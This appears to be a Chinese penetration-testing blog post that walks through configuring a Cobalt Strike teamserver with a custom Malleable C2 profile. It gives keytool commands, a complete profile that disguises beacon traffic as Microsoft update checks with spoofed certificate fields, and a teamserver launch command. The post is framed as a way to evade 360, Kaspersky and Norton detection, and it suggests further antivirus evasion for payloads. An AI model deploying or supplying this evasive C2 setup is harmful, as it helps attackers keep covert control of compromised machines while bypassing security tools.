首页 » 内网渗透 » 正文

【史诗级CS免杀操作/免杀360/卡巴斯基/诺盾】配置无敌C2-profile文件

file

生成免费的ssl证书,弃用cobaltstrike.store,用自己的zzhsec.store

第一步生成zzhsec.store文件

命令:
keytool -genkey -alias zzhsec -keyalg RSA -validity 36500 -keystore zzhsec.store
注意记得-alias后面的参数和-keystore后面的参数后面会用到C2-profile里面
接下来需要输入密码,一定要记得这串密码,后面会用到,不然到时候你需要自己回来重新生成下
file
然后输入名字,例如:US
然后一步步输入就行
file
最后这里输入y即可完成
file
然后再输入一次密码即可
ls查看当前目录就生成好了zzhsec.store文件
file

keytool具体参数生成可以参考改文章:
https://blog.csdn.net/luoyongsir/article/details/54929288

创建修改C2-profile文件

set sample_name "zzhsec POS Malware";

set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter

set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

#设置证书
https-certificate {
    set CN       "US"; 
    set O        "MicrosoftUpdates";   
    set C        "en";
    set L        "US";
    set OU       "MicrosoftUpdates";  
    set ST       "US";
    set validity "365";
}
#设置
code-signer{
    set keystore "zzhsec.store";
    set password "123.zzhsec!";
    set alias "zzhsec";
}

#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";

#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";

#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";

    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";

        id {
            netbios;
            parameter "id";
        }

        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }

    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";

    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/plain";

        output {
            base64;
            print;
        }
    }
}

上面文件对标生成的zzhsec.store即可
比如:

Is CN=US, OU=MicrosoftUpdatess, O=MicrosoftUpdatess, L=US, ST=US, C=en
替换
#设置证书
https-certificate {
    set CN       "US"; 
    set O        "MicrosoftUpdatess";   
    set C        "en";
    set L        "US";
    set OU       "MicrosoftUpdatess";  
    set ST       "US";
    set validity "365";
}
ps:注意对应好
以及下面的
#设置
code-signer{
    set keystore "zzhsec.store";
    set password "123.zzhsec!";
    set alias "zzhsec";
}
在上面的生成命令中的alias以及keystore后面的字段对应好
以及输入命令的时候,你输入的密码也需要替换

file

推荐两个Github上的C2-profile

https://github.com/rsmudge/Malleable-C2-Profiles
https://github.com/threatexpress/malleable-c2
官方的C2配置文章
https://www.cobaltstrike.com/help-malleable-c2

接下来就是验证C2-profile是否可用了

命令
./c2lint me.profile
file
file
没有出现什么问题就可以了

然后期待teamserver即可

命令
nohup ./teamserver 1.1.1.1 123456 ./me.profile &
然后就可以愉快的去连接了

对了,建议把teamserver的端口改一下

file
改成一些你用不到的服务端口即可

最后测试了下卡巴斯基的诺顿和360,走https流量

随便你怎么操作,都不拦截,之前的会拦截流量
直接生成exe的话,可能被杀,需要自己简单做一下免杀
我用的powershell上线的,其他的shellcode自己随便搞一搞免杀也是分分钟

推荐阅读:
https://xz.aliyun.com/t/2796
https://xz.aliyun.com/t/2239
https://www.chabug.org/web/832.html